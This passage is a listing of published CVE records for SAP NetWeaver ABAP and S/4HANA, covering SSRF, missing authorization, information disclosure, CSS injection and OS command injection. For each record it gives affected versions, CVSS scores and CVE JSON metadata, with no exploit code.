    CISA Coordinator (v2.0.3)
    CWE
    • CWE-918 - Server-Side Request Forgery
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server for ABAP Affected: SAP_BASIS 740
    Affected: SAP_BASIS 750
    Affected: SAP_BASIS 751
    Affected: SAP_BASIS 752
    Affected: SAP_BASIS 753
    Affected: SAP_BASIS 754
    Affected: SAP_BASIS 755
    Affected: SAP_BASIS 756
    Affected: SAP_BASIS 757
    Affected: SAP_BASIS 758
    Affected: SAP_BASIS 816
    Affected: SAP_BASIS 918
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-24316",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-03-10T15:36:06.953702Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-03-10T16:53:14.123Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server for ABAP",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_BASIS 740"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 750"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 751"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 752"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 753"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 754"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 755"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 756"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 757"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 758"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 816"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 918"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eSAP NetWeaver Application Server for ABAP provides an ABAP Report for testing purposes, which allows to send HTTP requests to arbitrary internal or external endpoints. The report is therefore vulnerable to Server-Side Request Forgery (SSRF). Successful exploitation could lead to interaction with potentially sensitive internal endpoints, resulting in a low impact on data confidentiality and integrity. There is no impact on availability of the application.\u003c/p\u003e"
                }
              ],
              "value": "SAP NetWeaver Application Server for ABAP provides an ABAP Report for testing purposes, which allows to send HTTP requests to arbitrary internal or external endpoints. The report is therefore vulnerable to Server-Side Request Forgery (SSRF). Successful exploitation could lead to interaction with potentially sensitive internal endpoints, resulting in a low impact on data confidentiality and integrity. There is no impact on availability of the application."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.4,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "LOW",
                "privilegesRequired": "LOW",
                "scope": "CHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-918",
                  "description": "CWE-918: Server-Side Request Forgery",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-03-10T00:17:51.285Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3689080"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Server-Side Request Forgery (SSRF) in SAP NetWeaver Application Server for ABAP",
          "x_generator": {
            "engine": "Vulnogram 1.0.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-24316",
        "datePublished": "2026-03-10T00:17:51.285Z",
        "dateReserved": "2026-01-21T22:15:25.361Z",
        "dateUpdated": "2026-03-10T16:53:14.123Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-24310 (GCVE-0-2026-24310)

    Vulnerability from nvd – Published: 2026-03-10 00:17 – Updated: 2026-03-10 16:53
    VLAI
    Title
    Missing Authorization check in SAP NetWeaver Application Server for ABAP
    Summary
    Due to missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker could execute specific ABAP function module and read the sensitive information from database catalog of the ABAP system. This vulnerability has low impact on the application's confidentiality with no effect on the integrity and availability.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server for ABAP Affected: SAP_BASIS 702
    Affected: SAP_BASIS 731
    Affected: SAP_BASIS 740
    Affected: SAP_BASIS 750
    Affected: SAP_BASIS 751
    Affected: SAP_BASIS 752
    Affected: SAP_BASIS 753
    Affected: SAP_BASIS 754
    Affected: SAP_BASIS 755
    Affected: SAP_BASIS 756
    Affected: SAP_BASIS 757
    Affected: SAP_BASIS 758
    Affected: SAP_BASIS 816
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-24310",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-03-10T15:36:11.428943Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-03-10T16:53:32.884Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server for ABAP",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_BASIS 702"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 731"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 740"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 750"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 751"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 752"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 753"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 754"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 755"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 756"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 757"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 758"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 816"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDue to missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker could execute specific ABAP function module and read the sensitive information from database catalog of the ABAP system. This vulnerability has low impact on the application\u0027s confidentiality with no effect on the integrity and availability.\u003c/p\u003e"
                }
              ],
              "value": "Due to missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker could execute specific ABAP function module and read the sensitive information from database catalog of the ABAP system. This vulnerability has low impact on the application\u0027s confidentiality with no effect on the integrity and availability."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "baseSeverity": "LOW",
                "confidentialityImpact": "LOW",
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "scope": "CHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-862",
                  "description": "CWE-862: Missing Authorization",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-03-10T00:17:21.077Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3694383"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Missing Authorization check in SAP NetWeaver Application Server for ABAP",
          "x_generator": {
            "engine": "Vulnogram 1.0.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-24310",
        "datePublished": "2026-03-10T00:17:21.077Z",
        "dateReserved": "2026-01-21T22:15:25.360Z",
        "dateUpdated": "2026-03-10T16:53:32.884Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-24309 (GCVE-0-2026-24309)

    Vulnerability from nvd – Published: 2026-03-10 00:17 – Updated: 2026-03-10 16:53
    VLAI
    Title
    Missing Authorization check in SAP NetWeaver Application Server for ABAP
    Summary
    Due to missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker could execute specific ABAP function module to read, modify or insert entries into the database configuration table of the ABAP system. This unauthorized content change could lead to reduced system performance or interruptions. The vulnerability has low impact on the application's integrity and availability, with no effect on confidentiality.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server for ABAP Affected: SAP_BASIS 700
    Affected: SAP_BASIS 701
    Affected: SAP_BASIS 702
    Affected: SAP_BASIS 731
    Affected: SAP_BASIS 740
    Affected: SAP_BASIS 750
    Affected: SAP_BASIS 751
    Affected: SAP_BASIS 752
    Affected: SAP_BASIS 753
    Affected: SAP_BASIS 754
    Affected: SAP_BASIS 755
    Affected: SAP_BASIS 756
    Affected: SAP_BASIS 757
    Affected: SAP_BASIS 758
    Affected: SAP_BASIS 816
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-24309",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-03-10T15:36:13.443096Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-03-10T16:53:39.013Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server for ABAP",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_BASIS 700"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 701"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 702"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 731"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 740"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 750"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 751"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 752"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 753"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 754"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 755"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 756"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 757"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 758"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 816"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDue to missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker could execute specific ABAP function module to read, modify or insert entries into the database configuration table of the ABAP system. This unauthorized content change could lead to reduced system performance or interruptions. The vulnerability has low impact on the application\u0027s integrity and availability, with no effect on confidentiality.\u003c/p\u003e"
                }
              ],
              "value": "Due to missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker could execute specific ABAP function module to read, modify or insert entries into the database configuration table of the ABAP system. This unauthorized content change could lead to reduced system performance or interruptions. The vulnerability has low impact on the application\u0027s integrity and availability, with no effect on confidentiality."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "LOW",
                "baseScore": 6.4,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "integrityImpact": "LOW",
                "privilegesRequired": "LOW",
                "scope": "CHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-862",
                  "description": "CWE-862: Missing Authorization",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-03-10T00:17:12.592Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3703856"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Missing Authorization check in SAP NetWeaver Application Server for ABAP",
          "x_generator": {
            "engine": "Vulnogram 1.0.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-24309",
        "datePublished": "2026-03-10T00:17:12.592Z",
        "dateReserved": "2026-01-21T22:15:25.360Z",
        "dateUpdated": "2026-03-10T16:53:39.013Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-24314 (GCVE-0-2026-24314)

    Vulnerability from nvd – Published: 2026-02-24 05:23 – Updated: 2026-02-24 16:44
    VLAI
    Title
    Information Disclosure vulnerability in S/4HANA (Manage Payment Media)
    Summary
    Under certain conditions SAP S/4HANA (Manage Payment Media) allows an authenticated attacker to access information which would otherwise be restricted. This could cause low impact on confidentiality of the application while integrity and availability are not impacted.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-497 - Exposure of Sensitive System Information to an Unauthorized Control Sphere
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE S/4HANA (Manage Payment Media) Affected: UIAPFI70 600
    Affected: 700
    Affected: 800
    Affected: 900
    Affected: 901
    Affected: 902
    Affected: UIS4H 109
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-24314",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-02-24T16:30:23.530917Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-02-24T16:44:18.533Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "S/4HANA (Manage Payment Media)",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "UIAPFI70 600"
                },
                {
                  "status": "affected",
                  "version": "700"
                },
                {
                  "status": "affected",
                  "version": "800"
                },
                {
                  "status": "affected",
                  "version": "900"
                },
                {
                  "status": "affected",
                  "version": "901"
                },
                {
                  "status": "affected",
                  "version": "902"
                },
                {
                  "status": "affected",
                  "version": "UIS4H 109"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eUnder certain conditions SAP S/4HANA (Manage Payment Media) allows an authenticated attacker to access information which would otherwise be restricted. This could cause low impact on confidentiality of the application while integrity and availability are not impacted.\u003c/p\u003e"
                }
              ],
              "value": "Under certain conditions SAP S/4HANA (Manage Payment Media) allows an authenticated attacker to access information which would otherwise be restricted. This could cause low impact on confidentiality of the application while integrity and availability are not impacted."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-497",
                  "description": "CWE-497: Exposure of Sensitive System Information to an Unauthorized Control Sphere",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-02-24T05:23:52.911Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3646297"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Information Disclosure vulnerability in S/4HANA (Manage Payment Media)",
          "x_generator": {
            "engine": "Vulnogram 0.5.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-24314",
        "datePublished": "2026-02-24T05:23:52.911Z",
        "dateReserved": "2026-01-21T22:15:25.361Z",
        "dateUpdated": "2026-02-24T16:44:18.533Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-27680 (GCVE-0-2026-27680)

    Vulnerability from cvelistv5 – Published: 2026-05-14 18:33 – Updated: 2026-05-14 19:17
    VLAI
    Title
    CSS Injection vulnerability in SAP NetWeaver Application Server ABAP
    Summary
    Due to improper input handling under certain conditions, SAP NetWeaver Application Server ABAP allows an attacker to inject custom Cascading Style Sheets (CSS) data into a web page served by the application. When a user accesses or clicks the affected page, the injected CSS is executed. As a result, the issue has a low impact on confidentiality, while integrity and availability are not impacted.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-276 - Incorrect Default Permissions
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server ABAP Affected: SAP_UI 758
    Affected: 816
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-27680",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-05-14T19:17:39.273035Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-05-14T19:17:51.192Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server ABAP",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_UI 758"
                },
                {
                  "status": "affected",
                  "version": "816"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDue to improper input handling under certain conditions, SAP NetWeaver Application Server ABAP allows an attacker to inject custom Cascading Style Sheets (CSS) data into a web page served by the application. When a user accesses or clicks the affected page, the injected CSS is executed. As a result, the issue has a low impact on confidentiality, while integrity and availability are not impacted.\u003c/p\u003e"
                }
              ],
              "value": "Due to improper input handling under certain conditions, SAP NetWeaver Application Server ABAP allows an attacker to inject custom Cascading Style Sheets (CSS) data into a web page served by the application. When a user accesses or clicks the affected page, the injected CSS is executed. As a result, the issue has a low impact on confidentiality, while integrity and availability are not impacted."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 3.1,
                "baseSeverity": "LOW",
                "confidentialityImpact": "LOW",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-276",
                  "description": "CWE-276: Incorrect Default Permissions",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-05-14T18:33:26.129Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3665042"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "CSS Injection vulnerability in SAP NetWeaver Application Server ABAP",
          "x_generator": {
            "engine": "Vulnogram 1.0.2"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-27680",
        "datePublished": "2026-05-14T18:33:26.129Z",
        "dateReserved": "2026-02-23T17:50:10.513Z",
        "dateUpdated": "2026-05-14T19:17:51.192Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-40135 (GCVE-0-2026-40135)

    Vulnerability from cvelistv5 – Published: 2026-05-12 02:21 – Updated: 2026-05-12 13:03
    VLAI
    Title
    OS Command Injection vulnerability in SAP NetWeaver Application Server for ABAP and ABAP Platform
    Summary
    An OS Command Injection vulnerability exists in the SAP NetWeaver Application Server for ABAP and ABAP Platform that allows an authenticated attacker with administrative access to execute specially crafted shell commands on the server, bypassing the logging mechanism. This allows the execution of unintended OS commands without detection, potentially impacting the integrity and availability of the application, with no impact on confidentiality.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-77 - Improper Neutralization of Special Elements used in a Command
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server for ABAP and ABAP Platform Affected: SAP_BASIS 700
    Affected: SAP_BASIS 701
    Affected: SAP_BASIS 702
    Affected: SAP_BASIS 731
    Affected: SAP_BASIS 740
    Affected: SAP_BASIS 750
    Affected: SAP_BASIS 751
    Affected: SAP_BASIS 752
    Affected: SAP_BASIS 753
    Affected: SAP_BASIS 754
    Affected: SAP_BASIS 755
    Affected: SAP_BASIS 756
    Affected: SAP_BASIS 757
    Affected: SAP_BASIS 758
    Affected: SAP_BASIS 816
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-40135",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-05-12T13:03:42.768169Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-05-12T13:03:50.003Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server for ABAP and ABAP Platform",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_BASIS 700"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 701"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 702"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 731"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 740"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 750"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 751"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 752"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 753"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 754"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 755"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 756"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 757"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 758"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 816"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eAn OS Command Injection vulnerability exists in the SAP NetWeaver Application Server for ABAP and ABAP Platform that allows an authenticated attacker with administrative access to execute specially crafted shell commands on the server, bypassing the logging mechanism. This allows the execution of unintended OS commands without detection, potentially impacting the integrity and availability of the application, with no impact on confidentiality.\u003c/p\u003e"
                }
              ],
              "value": "An OS Command Injection vulnerability exists in the SAP NetWeaver Application Server for ABAP and ABAP Platform that allows an authenticated attacker with administrative access to execute specially crafted shell commands on the server, bypassing the logging mechanism. This allows the execution of unintended OS commands without detection, potentially impacting the integrity and availability of the application, with no impact on confidentiality."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-77",
                  "description": "CWE-77: Improper Neutralization of Special Elements used in a Command",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-05-12T02:21:40.780Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3730019"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "OS Command Injection vulnerability in SAP NetWeaver Application Server for ABAP and ABAP Platform",
          "x_generator": {
            "engine": "Vulnogram 1.0.2"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-40135",
        "datePublished": "2026-05-12T02:21:40.780Z",
        "dateReserved": "2026-04-09T17:29:44.663Z",
        "dateUpdated": "2026-05-12T13:03:50.003Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
